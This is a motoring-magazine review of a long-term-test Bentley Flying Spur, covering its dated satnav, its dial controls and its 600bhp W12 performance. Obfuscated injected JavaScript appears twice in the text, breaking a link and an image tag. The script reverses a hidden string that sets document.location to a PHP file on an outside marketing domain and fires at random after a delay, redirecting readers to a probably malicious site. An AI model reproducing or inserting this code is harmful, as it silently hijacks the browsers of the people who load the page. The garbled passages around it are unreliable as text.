It’s a shame that the satellite navigation system is somewhat archaic by today’s standards (although in fairness, it was archaic in 2010 as well). The latest Continental series has a state-of-the-art number but ours has a creaky old square-screened unit that only has about half of Dubai in its database. Still, the method of navigating the system is straightforward – a large dial twists and clicks to operate everything from the air-con to the car’s ride height and suspension stiffness. Don’t forget that as well as luxury, Bentley has $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/2012-paris-motor-show-bentley-continental-gt3/” target=”_blank”>strong motorsport roots, so it’s designed to be driven hard, not just wafted about in.

Which brings us nicely on to the engine. Under the bonnet is a 600bhp, 6.0-litre W12 sending power to all four wheels. Six. Hundred. Horsepower. Even though the Flying Spur is enormous, and weighs 2525kg, it’ll still hit 100kph from standstill in 4.8 seconds and if we’re brave enough, it’ll hit 322kph. Yeek! In the few days it’s been at the office so far I’ve done little more than cruise to and from work in it so far, but a few squirts on the highway have shown that there isn’t much that can compete with the mid-range acceleration of our new toy.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/10/Bentley-Continental-Flying-Spur-004.jpg” width=”728″ height=”485″ />

I can’t guarantee we’ll be reaching the theoretical top speeds of the Flying Spur during our time with The Speed, but we’ll certainly be giving it a good workout over the winter. While keeping safe and responsible, obviously. It’s reassuring to know that the new Bentley Emirates service and repair facility is available, but if everything goes according to plan, we won’t be needing it.
